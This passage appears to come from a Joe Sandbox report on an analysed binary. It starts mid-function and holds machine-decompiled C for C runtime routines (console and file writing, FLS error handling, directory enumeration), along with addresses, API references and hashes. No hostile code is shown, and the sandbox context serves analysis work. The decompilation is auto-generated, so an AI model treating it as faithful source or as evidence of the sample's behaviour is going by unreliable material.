								_t237 = E013909F7( &_v136,  &_v76,  &_v120, (_v56 == 4) + 1,  &_v136);
								_t287 = _t286 + 0x10;
								if(_t237 == 0xffffffff) {
									goto L48;
								} else {
									L18:
									_t269 = _t269 - 1 + _t279;
									L27:
									_t269 =  &(_t269[1]);
									_v104 = _t269;
									_t193 = E0138C142(_v124, _t241,  &_v76, _v40,  &_v32, 5, _t241, _t241);
									_t286 = _t287 + 0x20;
									_v56 = _t193;
									if(_t193 == 0) {
										goto L48;
									} else {
										if(WriteFile(_v112,  &_v32, _t193,  &_v100, _t241) == 0) {
											L47:
											_v92 = GetLastError();
											goto L48;
										} else {
											_t273 = _v84 - _v108 + _t269;
											_v88 = _t273;
											if(_v100 < _v56) {
												goto L48;
											} else {
												if(_v51 != 0xa) {
													L34:
													if(_t269 >= _v96) {
														goto L48;
													} else {
														_t245 = _v128;
														continue;
													}
												} else {
													_t198 = 0xd;
													_v52 = _t198;
													if(WriteFile(_v112,  &_v52, 1,  &_v100, _t241) == 0) {
														goto L47;
													} else {
														if(_v100 < 1) {
															goto L48;
														} else {
															_v84 = _v84 + 1;
															_t273 = _t273 + 1;
															_v88 = _t273;
															goto L34;
														}
													}
												}
											}
										}
									}
								}
							}
						}
						goto L49;
						L19:
						_t264 =  *((intOrPtr*)(_t248 + _t186 + 0x2d));
						__eflags = _t264 & 0x00000004;
						if((_t264 & 0x00000004) == 0) {
							_v33 =  *_t269;
							_t188 = E01381D06(_t264);
							_t249 = _v33 & 0x000000ff;
							__eflags =  *((intOrPtr*)(_t188 + _t249 * 2)) - _t241;
							if( *((intOrPtr*)(_t188 + _t249 * 2)) >= _t241) {
								_push(1);
								_push(_t269);
								goto L26;
							} else {
								_t202 =  &(_t269[1]);
								_v56 = _t202;
								__eflags = _t202 - _v96;
								if(_t202 >= _v96) {
									_t264 = _v80;
									_t251 = _v44;
									_t241 = _v33;
									 *((char*)(_t251 +  *((intOrPtr*)(0x14a5e18 + _t264 * 4)) + 0x2e)) = _v33;
									 *(_t251 +  *((intOrPtr*)(0x14a5e18 + _t264 * 4)) + 0x2d) =  *(_t251 +  *((intOrPtr*)(0x14a5e18 + _t264 * 4)) + 0x2d) | 0x00000004;
									_t277 = _t273 + 1;
									goto L41;
								} else {
									_t206 = E01389194( &_v76, _t269, 2);
									_t287 = _t286 + 0xc;
									__eflags = _t206 - 0xffffffff;
									if(_t206 == 0xffffffff) {
										goto L48;
									} else {
										_t269 = _v56;
										goto L27;
									}
								}
							}
						} else {
							_t264 = _t264 & 0x000000fb;
							_v24 =  *((intOrPtr*)(_t248 + _t186 + 0x2e));
							_v23 =  *_t269;
							_push(2);
							 *(_t248 + _v48 + 0x2d) = _t264;
							_push( &_v24);
							L26:
							_push( &_v76);
							_t190 = E01389194();
							_t287 = _t286 + 0xc;
							__eflags = _t190 - 0xffffffff;
							if(_t190 == 0xffffffff) {
								goto L48;
							} else {
								goto L27;
							}
						}
						goto L49;
					}
				}
				L49:
				if(__eflags != 0) {
					_t183 = _v72;
					_t165 = _t183 + 0x350;
					 *_t165 =  *(_t183 + 0x350) & 0xfffffffd;
					__eflags =  *_t165;
				}
				__eflags = _v8 ^ _t285;
				asm("movsd");
				asm("movsd");
				asm("movsd");
				return E01377F14(_a4, _t241, _v8 ^ _t285, _t264, _a4,  &_v92);
			}

0x01389e6a
0x01389e71
0x01389e74
0x01389e7c
0x01389e7f
0x01389e8c
0x01389e8f
0x01389e92
0x01389e99
0x01389ea1
0x01389ea4
0x01389ea7
0x01389ead
0x01389eaf
0x01389eb6
0x01389ec0
0x01389ec2
0x01389ec5
0x01389ec8
0x01389ecb
0x01389ece
0x01389ed1
0x01389ed7
0x0138a1e2
0x0138a1e2
0x00000000
0x01389edd
0x01389ee5
0x01389ee8
0x01389eee
0x01389ef1
0x01389ef8
0x01389eff
0x01389f02
0x00000000
0x00000000
0x01389f0b
0x01389f10
0x01389f12
0x01389f15
0x01389f1a
0x01389f1e
0x00000000
0x00000000
0x00000000
0x01389f1e
0x01389f23
0x01389f25
0x01389f2a
0x01389fe4
0x01389feb
0x01389fec
0x01389fef
0x01389ff1
0x0138a195
0x0138a197
0x00000000
0x0138a199
0x0138a199
0x0138a19c
0x0138a1ab
0x0138a1af
0x0138a1b0
0x0138a1b0
0x00000000
0x0138a1b4
0x01389ff7
0x01389ff9
0x01389fff
0x0138a002
0x0138a00e
0x0138a017
0x0138a022
0x0138a027
0x0138a02a
0x0138a02d
0x00000000
0x0138a033
0x0138a033
0x00000000
0x0138a033
0x0138a02d
0x01389f30
0x01389f3f
0x01389f40
0x01389f43
0x01389f46
0x01389f4b
0x0138a161
0x0138a163
0x0138a165
0x0138a167
0x0138a171
0x0138a179
0x0138a17b
0x0138a17c
0x0138a180
0x0138a183
0x0138a183
0x0138a187
0x0138a187
0x0138a187
0x0138a18a
0x0138a18a
0x0138a18a
0x0138a18c
0x0138a18c
0x0138a190
0x01389f51
0x01389f51
0x01389f54
0x01389f56
0x01389f59
0x01389f5c
0x01389f60
0x01389f61
0x01389f65
0x01389f68
0x01389f6d
0x01389f77
0x01389f7c
0x01389f7f
0x01389f82
0x01389f82
0x01389f85
0x01389f88
0x01389f8a
0x01389f93
0x01389f97
0x01389f98
0x01389f9c
0x01389fa2
0x01389fab
0x01389fb8
0x01389fbf
0x01389fc3
0x01389fce
0x01389fd3
0x01389fd9
0x00000000
0x01389fdf
0x0138a036
0x0138a037
0x0138a0ba
0x0138a0c1
0x0138a0c9
0x0138a0d1
0x0138a0d6
0x0138a0d9
0x0138a0de
0x00000000
0x0138a0e4
0x0138a0f9
0x0138a1d9
0x0138a1df
0x00000000
0x0138a0ff
0x0138a108
0x0138a10a
0x0138a110
0x00000000
0x0138a116
0x0138a11a
0x0138a150
0x0138a153
0x00000000
0x0138a159
0x0138a159
0x00000000
0x0138a159
0x0138a11c
0x0138a11e
0x0138a120
0x0138a139
0x00000000
0x0138a13f
0x0138a143
0x00000000
0x0138a149
0x0138a149
0x0138a14c
0x0138a14d
0x00000000
0x0138a14d
0x0138a143
0x0138a139
0x0138a11a
0x0138a110
0x0138a0f9
0x0138a0de
0x01389fd9
0x01389f4b
0x00000000
0x0138a03b
0x0138a03b
0x0138a03f
0x0138a042
0x0138a064
0x0138a067
0x0138a06c
0x0138a070
0x0138a074
0x0138a0a2
0x0138a0a4
0x00000000
0x0138a076
0x0138a076
0x0138a079
0x0138a07c
0x0138a07f
0x0138a1b6
0x0138a1b9
0x0138a1bc
0x0138a1c6
0x0138a1d1
0x0138a1d6
0x00000000
0x0138a085
0x0138a08c
0x0138a091
0x0138a094
0x0138a097
0x00000000
0x0138a09d
0x0138a09d
0x00000000
0x0138a09d
0x0138a097
0x0138a07f
0x0138a044
0x0138a048
0x0138a04b
0x0138a050
0x0138a056
0x0138a058
0x0138a05f
0x0138a0a5
0x0138a0a8
0x0138a0a9
0x0138a0ae
0x0138a0b1
0x0138a0b4
0x00000000
0x00000000
0x00000000
0x00000000
0x0138a0b4
0x00000000
0x0138a042
0x01389edd
0x0138a1e5
0x0138a1e5
0x0138a1e7
0x0138a1ea
0x0138a1ea
0x0138a1ea
0x0138a1ea
0x0138a1fc
0x0138a1fe
0x0138a1ff
0x0138a200
0x0138a20a

APIs

GetConsoleOutputCP.KERNEL32(00000000,00000000,?), ref: 01389EA7
__fassign.LIBCMT ref: 0138A08C
__fassign.LIBCMT ref: 0138A0A9
WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0138A0F1
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 0138A131
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 0138A1D9

Memory Dump Source

Source File: 00000002.00000002.281026800.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true

Associated: 00000002.00000002.280939181.0000000001370000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.281545635.0000000001394000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.281900158.00000000013A3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.284995880.00000000014A4000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.285035285.00000000014A5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.285069288.00000000014A7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1370000_321.jbxd

Similarity

API ID: FileWrite__fassign$ConsoleErrorLastOutput
String ID:
API String ID: 1735259414-0
Opcode ID: 46acd7438509b5d96b661b97cd805525a03c6f4228e1fd61200a77bf3b76ed55
Instruction ID: 6396b9a72365c2cf05027e61d62761e9b3e64d8949dc3daad9d5d0c7b6fa7708
Opcode Fuzzy Hash: 46acd7438509b5d96b661b97cd805525a03c6f4228e1fd61200a77bf3b76ed55
Instruction Fuzzy Hash: 6AC1AE71D002589FCF15DFA8C9809EDFBB9BF48318F28816AE955BB341D6319A46CB60

Uniqueness

Uniqueness Score: -1.00%

Function 0137B23A Relevance: 9.1, APIs: 6, Instructions: 60
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 82%

			E0137B23A(void* __ecx) {
				void* _t8;
				void* _t11;
				void* _t13;
				void* _t14;
				void* _t18;
				void* _t23;
				long _t24;
				void* _t27;

				_t13 = __ecx;
				if( *0x13a3050 != 0xffffffff) {
					_t24 = GetLastError();
					_t11 = E0137C443(_t13,  *0x13a3050);
					_t14 = _t23;
					if(_t11 == 0xffffffff) {
						L5:
						_t11 = 0;
					} else {
						if(_t11 == 0) {
							if(E0137C47E(_t14,  *0x13a3050, 0xffffffff) != 0) {
								_push(0x28);
								_t27 = E0137C583();
								_t18 = 1;
								if(_t27 == 0) {
									L8:
									_t11 = 0;
									E0137C47E(_t18,  *0x13a3050, 0);
								} else {
									_t8 = E0137C47E(_t18,  *0x13a3050, _t27);
									_pop(_t18);
									if(_t8 != 0) {
										_t11 = _t27;
										_t27 = 0;
									} else {
										goto L8;
									}
								}
								E0137FF29(_t27);
							} else {
								goto L5;
							}
						}
					}
					SetLastError(_t24);
					return _t11;
				} else {
					return 0;
				}
			}

0x0137b23a
0x0137b241
0x0137b254
0x0137b25b
0x0137b25d
0x0137b261
0x0137b27a
0x0137b27a
0x0137b263
0x0137b265
0x0137b278
0x0137b27f
0x0137b288
0x0137b28b
0x0137b28e
0x0137b2a2
0x0137b2a2
0x0137b2ab
0x0137b290
0x0137b297
0x0137b29d
0x0137b2a0
0x0137b2b4
0x0137b2b6
0x00000000
0x00000000
0x00000000
0x0137b2a0
0x0137b2b9
0x00000000
0x00000000
0x00000000
0x0137b278
0x0137b265
0x0137b2c1
0x0137b2cb
0x0137b243
0x0137b245
0x0137b245

APIs

GetLastError.KERNEL32(?,?,0137B231,0137996F,0137867B), ref: 0137B248
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0137B256
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0137B26F
SetLastError.KERNEL32(00000000,0137B231,0137996F,0137867B), ref: 0137B2C1

Memory Dump Source

Source File: 00000002.00000002.281026800.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true

Associated: 00000002.00000002.280939181.0000000001370000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.281545635.0000000001394000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.281900158.00000000013A3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.284995880.00000000014A4000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.285035285.00000000014A5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.285069288.00000000014A7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1370000_321.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 965d3c256fa8c84b4ca7b50d45cde3374339d25ebdef8f06e8ae922fc664dec4
Instruction ID: 3e901a3f731beeb223e2eb6ef33018953e7fe09e373c81812065f59d68838923
Opcode Fuzzy Hash: 965d3c256fa8c84b4ca7b50d45cde3374339d25ebdef8f06e8ae922fc664dec4
Instruction Fuzzy Hash: 2D01A77210A6135EEB3626BDBC8466FABACFF1277CB20432DE510555E8EF6A48019784

Uniqueness

Uniqueness Score: -1.00%

Function 0138C61C Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 206
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E0138C61C(void* __esi, signed int* _a4, signed int _a8, intOrPtr _a12) {
				intOrPtr _v0;
				signed int _v6;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr* _v72;
				intOrPtr* _v104;
				intOrPtr* _v108;
				intOrPtr _v112;
				signed int _v124;
				struct _WIN32_FIND_DATAW _v608;
				char _v609;
				intOrPtr* _v616;
				union _FINDEX_INFO_LEVELS _v620;
				union _FINDEX_INFO_LEVELS _v624;
				union _FINDEX_INFO_LEVELS _v628;
				signed int _v632;
				union _FINDEX_INFO_LEVELS _v636;
				union _FINDEX_INFO_LEVELS _v640;
				signed int _v644;
				signed int _v648;
				union _FINDEX_INFO_LEVELS _v652;
				union _FINDEX_INFO_LEVELS _v656;
				union _FINDEX_INFO_LEVELS _v660;
				union _FINDEX_INFO_LEVELS _v664;
				signed int _v668;
				union _FINDEX_INFO_LEVELS _v672;
				union _FINDEX_INFO_LEVELS _v676;
				intOrPtr _v724;
				void* __ebx;
				void* __edi;
				intOrPtr* _t131;
				signed int _t132;
				signed int _t134;
				signed int _t139;
				signed int _t140;
				intOrPtr* _t150;
				signed int _t152;
				intOrPtr _t153;
				signed int _t157;
				signed int _t159;
				signed int _t164;
				signed int _t166;
				char _t168;
				signed char _t169;
				signed int _t175;
				union _FINDEX_INFO_LEVELS _t179;
				signed int _t185;
				union _FINDEX_INFO_LEVELS _t188;
				intOrPtr* _t196;
				signed int _t199;
				intOrPtr _t204;
				signed int _t206;
				signed int _t209;
				signed int _t211;
				signed int _t212;
				signed int _t213;
				signed int _t215;
				signed int _t217;
				signed int _t218;
				signed int* _t219;
				signed int _t222;
				void* _t225;
				union _FINDEX_INFO_LEVELS _t226;
				void* _t227;
				intOrPtr _t229;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				signed int _t236;
				intOrPtr* _t239;
				signed int _t241;
				intOrPtr* _t244;
				signed int _t249;
				signed int _t255;
				signed int _t257;
				signed int _t263;
				intOrPtr* _t264;
				signed int _t272;
				signed int _t274;
				intOrPtr* _t275;
				void* _t277;
				signed int _t280;
				signed int _t283;
				signed int _t285;
				intOrPtr _t287;
				void* _t288;
				signed int* _t292;
				signed int _t293;
				signed int _t295;
				signed int _t296;
				signed int _t297;
				signed int _t299;
				void* _t300;
				void* _t301;
				signed int _t302;
				void* _t306;
				signed int _t307;
				void* _t308;
				void* _t309;
				void* _t310;
				signed int _t311;
				void* _t312;
				void* _t313;

				_t131 = _a8;
				_t309 = _t308 - 0x28;
				_push(__esi);
				_t317 = _t131;
				if(_t131 != 0) {
					_t292 = _a4;
					_t222 = 0;
					 *_t131 = 0;
					_t283 = 0;
					_t132 =  *_t292;
					_t232 = 0;
					_v608.cAlternateFileName = 0;
					_v40 = 0;
					_v36 = 0;
					__eflags = _t132;
					if(_t132 == 0) {
						L9:
						_v8 = _t222;
						_t134 = _t232 - _t283;
						_t293 = _t283;
						_v12 = _t293;
						_t271 = (_t134 >> 2) + 1;
						_t136 = _t134 + 3 >> 2;
						__eflags = _t232 - _t293;
						_v16 = (_t134 >> 2) + 1;
						asm("sbb esi, esi");
						_t295 =  !_t293 & _t134 + 0x00000003 >> 0x00000002;
						__eflags = _t295;
						if(_t295 != 0) {
							_t213 = _t283;
							_t280 = _t222;
							do {
								_t264 =  *_t213;
								_t20 = _t264 + 1; // 0x1
								_v20 = _t20;
								do {
									_t215 =  *_t264;
									_t264 = _t264 + 1;
									__eflags = _t215;
								} while (_t215 != 0);
								_t222 = _t222 + 1 + _t264 - _v20;
								_t213 = _v12 + 4;
								_t280 = _t280 + 1;
								_v12 = _t213;
								__eflags = _t280 - _t295;
							} while (_t280 != _t295);
							_t271 = _v16;
							_v8 = _t222;
							_t222 = 0;
							__eflags = 0;
						}
						_t296 = E01382D2F(_t136, _t271, _v8, 1);
						_t310 = _t309 + 0xc;
						__eflags = _t296;
						if(_t296 != 0) {
							_v12 = _t283;
							_t139 = _t296 + _v16 * 4;
							_t233 = _t139;
							_v28 = _t139;
							_t140 = _t283;
							_v16 = _t233;
							__eflags = _t140 - _v40;
							if(_t140 == _v40) {
								L24:
								_v12 = _t222;
								 *_a8 = _t296;
								_t297 = _t222;
								goto L25;
							} else {
								_t274 = _t296 - _t283;
								__eflags = _t274;
								_v32 = _t274;
								do {
									_t150 =  *_t140;
									_t275 = _t150;
									_v24 = _t150;
									_v20 = _t275 + 1;
									do {
										_t152 =  *_t275;
										_t275 = _t275 + 1;
										__eflags = _t152;
									} while (_t152 != 0);
									_t153 = _t275 - _v20 + 1;
									_push(_t153);
									_v20 = _t153;
									_t157 = E01391799(_t233, _v28 - _t233 + _v8, _v24);
									_t310 = _t310 + 0x10;
									__eflags = _t157;
									if(_t157 != 0) {
										_push(_t222);
										_push(_t222);
										_push(_t222);
										_push(_t222);
										_push(_t222);
										E0138016C();
										asm("int3");
										_t306 = _t310;
										_push(_t233);
										_t239 = _v72;
										_t65 = _t239 + 1; // 0x1
										_t277 = _t65;
										do {
											_t159 =  *_t239;
											_t239 = _t239 + 1;
											__eflags = _t159;
										} while (_t159 != 0);
										_push(_t283);
										_t285 = _a8;
										_t241 = _t239 - _t277 + 1;
										_v12 = _t241;
										__eflags = _t241 -  !_t285;
										if(_t241 <=  !_t285) {
											_push(_t222);
											_push(_t296);
											_t68 = _t285 + 1; // 0x1
											_t225 = _t68 + _t241;
											_t300 = E013858A2(_t225, 1);
											__eflags = _t285;
											if(_t285 == 0) {
												L40:
												_push(_v12);
												_t225 = _t225 - _t285;
												_t164 = E01391799(_t300 + _t285, _t225, _v0);
												_t311 = _t310 + 0x10;
												__eflags = _t164;
												if(_t164 != 0) {
													goto L45;
												} else {
													_t229 = _a12;
													_t206 = E0138CB4F(_t229);
													_v12 = _t206;
													__eflags = _t206;
													if(_t206 == 0) {
														 *( *(_t229 + 4)) = _t300;
														_t302 = 0;
														_t77 = _t229 + 4;
														 *_t77 =  *(_t229 + 4) + 4;
														__eflags =  *_t77;
													} else {
														E013871B2(_t300);
														_t302 = _v12;
													}
													E013871B2(0);
													_t209 = _t302;
													goto L37;
												}
											} else {
												_push(_t285);
												_t211 = E01391799(_t300, _t225, _a4);
												_t311 = _t310 + 0x10;
												__eflags = _t211;
												if(_t211 != 0) {
													L45:
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													E0138016C();
													asm("int3");
													_push(_t306);
													_t307 = _t311;
													_t312 = _t311 - 0x298;
													_t166 =  *0x13a3014; // 0x98b2b77b
													_v124 = _t166 ^ _t307;
													_t244 = _v108;
													_t278 = _v104;
													_push(_t225);
													_push(0);
													_t287 = _v112;
													_v724 = _t278;
													__eflags = _t244 - _t287;
													if(_t244 != _t287) {
														while(1) {
															_t204 =  *_t244;
															__eflags = _t204 - 0x2f;
															if(_t204 == 0x2f) {
																break;
															}
															__eflags = _t204 - 0x5c;
															if(_t204 != 0x5c) {
																__eflags = _t204 - 0x3a;
																if(_t204 != 0x3a) {
																	_t244 = E01391EA0(_t287, _t244);
																	__eflags = _t244 - _t287;
																	if(_t244 != _t287) {
																		continue;
																	}
																}
															}
															break;
														}
														_t278 = _v616;
													}
													_t168 =  *_t244;
													_v609 = _t168;
													__eflags = _t168 - 0x3a;
													if(_t168 != 0x3a) {
														L56:
														_t226 = 0;
														__eflags = _t168 - 0x2f;
														if(__eflags == 0) {
															L59:
															_t169 = 1;
														} else {
															__eflags = _t168 - 0x5c;
															if(__eflags == 0) {
																goto L59;
															} else {
																__eflags = _t168 - 0x3a;
																_t169 = 0;
																if(__eflags == 0) {
																	goto L59;
																}
															}
														}
														_v676 = _t226;
														_v672 = _t226;
														_push(_t300);
														asm("sbb eax, eax");
														_v668 = _t226;
														_v664 = _t226;
														_v644 =  ~(_t169 & 0x000000ff) & _t244 - _t287 + 0x00000001;
														_v660 = _t226;
														_v656 = _t226;
														_t175 = E013827BB(_t244 - _t287 + 1, _t287,  &_v676, E0138C3AB(_t278, __eflags));
														_t313 = _t312 + 0xc;
														asm("sbb eax, eax");
														_t179 = FindFirstFileExW( !( ~_t175) & _v668, _t226,  &_v608, _t226, _t226, _t226);
														_t301 = _t179;
														__eflags = _t301 - 0xffffffff;
														if(_t301 != 0xffffffff) {
															_t249 =  *((intOrPtr*)(_v616 + 4)) -  *_v616;
															__eflags = _t249;
															_v648 = _t249 >> 2;
															do {
																_v640 = _t226;
																_v636 = _t226;
																_v632 = _t226;
																_v628 = _t226;
																_v624 = _t226;
																_v620 = _t226;
																_t185 = E0138C54D( &(_v608.cFileName),  &_v640,  &_v609, E0138C3AB(_t278, __eflags));
																_t313 = _t313 + 0x10;
																asm("sbb eax, eax");
																_t188 =  !( ~_t185) & _v632;
																__eflags =  *_t188 - 0x2e;
																if( *_t188 != 0x2e) {
																	L67:
																	_push(_v616);
																	_push(_v644);
																	_push(_t287);
																	_push(_t188);
																	L33();
																	_t313 = _t313 + 0x10;
																	_v652 = _t188;
																	__eflags = _t188;
																	if(_t188 != 0) {
																		__eflags = _v620 - _t226;
																		if(_v620 != _t226) {
																			E013871B2(_v632);
																			_t188 = _v652;
																		}
																		_t226 = _t188;
																	} else {
																		goto L68;
																	}
																} else {
																	_t255 =  *((intOrPtr*)(_t188 + 1));
																	__eflags = _t255;
																	if(_t255 == 0) {
																		goto L68;
																	} else {
																		__eflags = _t255 - 0x2e;
																		if(_t255 != 0x2e) {
																			goto L67;
																		} else {
																			__eflags =  *((intOrPtr*)(_t188 + 2)) - _t226;
																			if( *((intOrPtr*)(_t188 + 2)) == _t226) {
																				goto L68;
																			} else {
																				goto L67;
																			}
																		}
																	}
																}
																L76:
																FindClose(_t301);
																goto L77;
																L68:
																__eflags = _v620 - _t226;
																if(_v620 != _t226) {
																	E013871B2(_v632);
																}
																__eflags = FindNextFileW(_t301,  &_v608);
															} while (__eflags != 0);
															_t196 = _v616;
															_t257 = _v648;
															_t278 =  *_t196;
															_t199 =  *((intOrPtr*)(_t196 + 4)) -  *_t196 >> 2;
															__eflags = _t257 - _t199;
															if(_t257 != _t199) {
																E01391970(_t278, _t278 + _t257 * 4, _t199 - _t257, 4, E0138C535);
															}
															goto L76;
														} else {
															_push(_v616);
															_push(_t226);
															_push(_t226);
															_push(_t287);
															L33();
															_t226 = _t179;
														}
														L77:
														__eflags = _v656;
														_pop(_t300);
														if(_v656 != 0) {
															E013871B2(_v668);
														}
														_t190 = _t226;
													} else {
														_t190 = _t287 + 1;
														__eflags = _t244 - _t287 + 1;
														if(_t244 == _t287 + 1) {
															_t168 = _v609;
															goto L56;
														} else {
															_push(_t278);
															_push(0);
															_push(0);
															_push(_t287);
															L33();
														}
													}
													_pop(_t288);
													__eflags = _v16 ^ _t307;
													_pop(_t227);
													return E01377F14(_t190, _t227, _v16 ^ _t307, _t278, _t288, _t300);
												} else {
													goto L40;
												}
											}
										} else {
											_t209 = 0xc;
											L37:
											return _t209;
										}
									} else {
										goto L23;
									}
									goto L81;
									L23:
									_t212 = _v12;
									_t263 = _v16;
									 *((intOrPtr*)(_v32 + _t212)) = _t263;
									_t140 = _t212 + 4;
									_t233 = _t263 + _v20;
									_v16 = _t233;
									_v12 = _t140;
									__eflags = _t140 - _v40;
								} while (_t140 != _v40);
								goto L24;
							}
						} else {
							_t297 = _t296 | 0xffffffff;
							_v12 = _t297;
							L25:
							E013871B2(_t222);
							_pop(_t234);
							goto L26;
						}
					} else {
						while(1) {
							_v8 = 0x3f2a;
							_v6 = _t222;
							_t217 = E01391E60(_t132,  &_v8);
							_t234 =  *_t292;
							__eflags = _t217;
							if(_t217 != 0) {
								_push( &(_v608.cAlternateFileName));
								_push(_t217);
								_push(_t234);
								L46();
								_t309 = _t309 + 0xc;
								_v12 = _t217;
								_t297 = _t217;
							} else {
								_t218 =  &(_v608.cAlternateFileName);
								_push(_t218);
								_push(_t222);
								_push(_t222);
								_push(_t234);
								L33();
								_t297 = _t218;
								_t309 = _t309 + 0x10;
								_v12 = _t297;
							}
							__eflags = _t297;
							if(_t297 != 0) {
								break;
							}
							_t292 =  &(_a4[1]);
							_a4 = _t292;
							_t132 =  *_t292;
							__eflags = _t132;
							if(_t132 != 0) {
								continue;
							} else {
								_t283 = _v608.cAlternateFileName;
								_t232 = _v40;
								goto L9;
							}
							goto L81;
						}
						_t283 = _v608.cAlternateFileName;
						L26:
						_t272 = _t283;
						_v32 = _t272;
						__eflags = _v40 - _t272;
						asm("sbb ecx, ecx");
						_t236 =  !_t234 & _v40 - _t272 + 0x00000003 >> 0x00000002;
						__eflags = _t236;
						_v28 = _t236;
						if(_t236 != 0) {
							_t299 = _t236;
							do {
								E013871B2( *_t283);
								_t222 = _t222 + 1;
								_t283 = _t283 + 4;
								__eflags = _t222 - _t299;
							} while (_t222 != _t299);
							_t283 = _v608.cAlternateFileName;
							_t297 = _v12;
						}
						E013871B2(_t283);
						goto L31;
					}
				} else {
					_t219 = E0137FD24(_t317);
					_t297 = 0x16;
					 *_t219 = _t297;
					E0138013F();
					L31:
					return _t297;
				}
				L81:
			}

0x0138c621
0x0138c624
0x0138c627
0x0138c628
0x0138c62a
0x0138c640
0x0138c644
0x0138c647
0x0138c649
0x0138c64b
0x0138c64d
0x0138c64f
0x0138c652
0x0138c655
0x0138c658
0x0138c65a
0x0138c6bd
0x0138c6bf
0x0138c6c2
0x0138c6c4
0x0138c6c8
0x0138c6d1
0x0138c6d2
0x0138c6d5
0x0138c6d7
0x0138c6da
0x0138c6de
0x0138c6de
0x0138c6e0
0x0138c6e2
0x0138c6e4
0x0138c6e6
0x0138c6e6
0x0138c6e8
0x0138c6eb
0x0138c6ee
0x0138c6ee
0x0138c6f0
0x0138c6f1
0x0138c6f1
0x0138c6fc
0x0138c6fe
0x0138c701
0x0138c702
0x0138c705
0x0138c705
0x0138c709
0x0138c70c
0x0138c70f
0x0138c70f
0x0138c70f
0x0138c71c
0x0138c71e
0x0138c721
0x0138c723
0x0138c73b
0x0138c73e
0x0138c741
0x0138c743
0x0138c746
0x0138c748
0x0138c74b
0x0138c74e
0x0138c7ab
0x0138c7ae
0x0138c7b1
0x0138c7b3
0x00000000
0x0138c750
0x0138c752
0x0138c752
0x0138c754
0x0138c757
0x0138c757
0x0138c759
0x0138c75b
0x0138c761
0x0138c764
0x0138c764
0x0138c766
0x0138c767
0x0138c767
0x0138c76e
0x0138c771
0x0138c775
0x0138c782
0x0138c787
0x0138c78a
0x0138c78c
0x0138c800
0x0138c801
0x0138c802
0x0138c803
0x0138c804
0x0138c805
0x0138c80a
0x0138c80e
0x0138c810
0x0138c811
0x0138c814
0x0138c814
0x0138c817
0x0138c817
0x0138c819
0x0138c81a
0x0138c81a
0x0138c81e
0x0138c81f
0x0138c826
0x0138c829
0x0138c82c
0x0138c82e
0x0138c836
0x0138c837
0x0138c838
0x0138c83b
0x0138c845
0x0138c849
0x0138c84b
0x0138c85f
0x0138c85f
0x0138c862
0x0138c86c
0x0138c871
0x0138c874
0x0138c876
0x00000000
0x0138c878
0x0138c878
0x0138c87d
0x0138c884
0x0138c887
0x0138c889
0x0138c89a
0x0138c89c
0x0138c89e
0x0138c89e
0x0138c89e
0x0138c88b
0x0138c88c
0x0138c891
0x0138c894
0x0138c8a3
0x0138c8a9
0x00000000
0x0138c8ac
0x0138c84d
0x0138c84d
0x0138c853
0x0138c858
0x0138c85b
0x0138c85d
0x0138c8af
0x0138c8b1
0x0138c8b2
0x0138c8b3
0x0138c8b4
0x0138c8b5
0x0138c8b6
0x0138c8bb
0x0138c8be
0x0138c8bf
0x0138c8c1
0x0138c8c7
0x0138c8ce
0x0138c8d1
0x0138c8d4
0x0138c8d7
0x0138c8d8
0x0138c8d9
0x0138c8dc
0x0138c8e2
0x0138c8e4
0x0138c8e6
0x0138c8e6
0x0138c8e8
0x0138c8ea
0x00000000
0x00000000
0x0138c8ec
0x0138c8ee
0x0138c8f0
0x0138c8f2
0x0138c8fd
0x0138c8ff
0x0138c901
0x00000000
0x00000000
0x0138c901
0x0138c8f2
0x00000000
0x0138c8ee
0x0138c903
0x0138c903
0x0138c909
0x0138c90b
0x0138c911
0x0138c913
0x0138c935
0x0138c935
0x0138c937
0x0138c939
0x0138c945
0x0138c945
0x0138c93b
0x0138c93b
0x0138c93d
0x00000000
0x0138c93f
0x0138c93f
0x0138c941
0x0138c943
0x00000000
0x00000000
0x0138c943
0x0138c93d
0x0138c94d
0x0138c955
0x0138c95b
0x0138c95c
0x0138c95e
0x0138c966
0x0138c96c
0x0138c972
0x0138c978
0x0138c98c
0x0138c991
0x0138c99c
0x0138c9ac
0x0138c9b2
0x0138c9b4
0x0138c9b7
0x0138c9da
0x0138c9da
0x0138c9df
0x0138c9e5
0x0138c9e5
0x0138c9eb
0x0138c9f1
0x0138c9f7
0x0138c9fd
0x0138ca03
0x0138ca24
0x0138ca29
0x0138ca2e
0x0138ca32
0x0138ca38
0x0138ca3b
0x0138ca4e
0x0138ca4e
0x0138ca54
0x0138ca5a
0x0138ca5b
0x0138ca5c
